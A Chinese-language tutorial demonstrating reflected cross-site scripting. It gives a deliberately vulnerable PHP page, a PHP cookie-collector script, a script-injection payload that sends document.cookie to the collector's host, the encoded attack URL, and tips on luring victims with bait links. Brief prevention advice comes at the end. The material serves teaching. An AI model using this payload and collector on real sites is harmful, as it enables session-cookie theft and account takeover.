[點(diǎn)晴永久免費(fèi)OA]XSS跨站腳本攻擊過(guò)程最簡(jiǎn)單演示
大多數(shù)人對(duì)于XSS的原理有一個(gè)基本認(rèn)識(shí),這里不再重復(fù),只給出一個(gè)能夠演示其原理的完整樣例。 1 角色分配
2 源碼實(shí)例2.1 漏洞網(wǎng)站存在漏洞的URL為:http://172.16.35.135/xss_demo.php <?php session_start(); ?> <!doctype html> <html> <head> <title>XSS demo</title> </head> <body> <form> <input style="width:300px;" type="text" name="address1" value="<?php echo $_GET["address1"]; ?>" /> <input type="submit" value="Submit" /> </form> </body> </html> 該網(wǎng)頁(yè)把用戶通過(guò)GET發(fā)送過(guò)來(lái)的表單數(shù)據(jù),未經(jīng)處理直接寫入返回的html流,這就是XSS漏洞所在。 2.2 黑客接收網(wǎng)站接收網(wǎng)站的URL為 http://172.16.2.192/xss_hacker.php <?php $victim = ''XXS得到的 cookie:''. $_SERVER[''REMOTE_ADDR'']. '':'' .$_GET[''cookie'']; file_put_contents(''xss_victim.txt'', $victim); 把受害用戶的IP地址和訪問(wèn)漏洞網(wǎng)站時(shí)使用的cookie,一起寫入xss_victim.txt文件保存?zhèn)溆谩?/span> 2.3 用戶正常訪問(wèn)用戶使用IE11訪問(wèn)網(wǎng)站?,F(xiàn)在網(wǎng)站一般都采用session+cookie來(lái)保存用戶登錄信息,網(wǎng)站通過(guò)驗(yàn)證cookie來(lái)確實(shí)是否是合法已登錄用戶,所以cookie是用戶的敏感數(shù)據(jù). 3 攻擊過(guò)程3.1 黑客準(zhǔn)備攻擊字符串,構(gòu)造攻擊URL黑客可以通過(guò)各種掃描工具或者人工輸入來(lái)找到有XSS漏洞的網(wǎng)站URL,然后精心構(gòu)造攻擊字符串。對(duì)于本例來(lái)說(shuō)構(gòu)造出來(lái)的字符串為: "/> <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script><!-- 只要把這個(gè)字符串作為漏洞網(wǎng)站文本編輯框的表單值輸入提交,就會(huì)造成攻擊。手工輸入這個(gè)字符串,并提交,瀏覽器地址欄自動(dòng)生成攻擊URL。如下圖: 此時(shí),用戶訪問(wèn)漏洞網(wǎng)站的html代碼,被修改成了: <!doctype html> <html> <head> <title>XSS demo</title> </head> <body> <form> <input style="width:500px;" type="text" name="address1" value=""/> <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script><!--" /> <input type="submit" value="Submit" /> </form> </body> </html> 明顯看出,這個(gè)html回去執(zhí)行一個(gè)腳本,這個(gè)腳本功能是把用戶的cookie發(fā)送到黑客的接收網(wǎng)站。 最終生成的攻擊URL為: http://172.16.35.135/xss_demo.php?address1=%22%2F%3E+%3Cscript%3Ewindow.open%28%22http%3A%2F%2F172.16.2.192%2Fxss_hacker.php%3Fcookie%3D%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E%3C%21-- 接下來(lái)要做的就是,尋找受害人,誘惑其點(diǎn)擊上述URL。 3.2 用戶上當(dāng)誤點(diǎn)擊攻擊URL黑客可以采取各種手段,包括發(fā)Email,在各種論壇網(wǎng)站發(fā)布此攻擊URL,如做成如下誘人連接。 屌絲們最喜歡美女了,在好奇心的驅(qū)動(dòng)下,點(diǎn)擊了這個(gè)美女圖片。而點(diǎn)擊的后果正是訪問(wèn)前面的攻擊URL。 3.3 用戶敏感數(shù)據(jù)被發(fā)送到黑客接收網(wǎng)站受害用戶訪問(wèn)攻擊URL后,其敏感數(shù)據(jù)自動(dòng)發(fā)送到黑客的接收網(wǎng)站。接收網(wǎng)站把這些敏感信息保存到文件中,當(dāng)然現(xiàn)實(shí)的情況一定是存入數(shù)據(jù)庫(kù)中了。 xss_victim.txt中現(xiàn)在保存了受害者的敏感數(shù)據(jù)。
注意,默認(rèn)IE11開啟了XSS篩選器,此時(shí)IE會(huì)阻止上述簡(jiǎn)單攻擊腳本。為模擬攻擊,我們臨時(shí)把XSS篩選器禁用。 3.4 黑客利用敏感數(shù)據(jù)做壞事有了受害用戶的敏感數(shù)據(jù),就可以利用這些數(shù)據(jù)做各種壞事了,比如以受害用戶身份登錄漏洞網(wǎng)站,等等。 4 XSS的預(yù)防XSS的預(yù)防可以從多方面著手: (1)如前面所述,瀏覽器自身可以識(shí)別簡(jiǎn)單的XSS攻擊字符串,從而阻止簡(jiǎn)單的XSS攻擊; (2)從根本上說(shuō),解決辦法是消除網(wǎng)站的XSS漏洞,這就需要網(wǎng)站開發(fā)者運(yùn)用轉(zhuǎn)義安全字符等手段,始終把安全放在心上; (3)對(duì)于普通網(wǎng)民,需要注意盡量抵擋誘惑,別去點(diǎn)擊非知名網(wǎng)站的鏈接。 該文章在 2020/4/8 16:31:56 編輯過(guò) |
關(guān)鍵字查詢
相關(guān)文章
正在查詢... |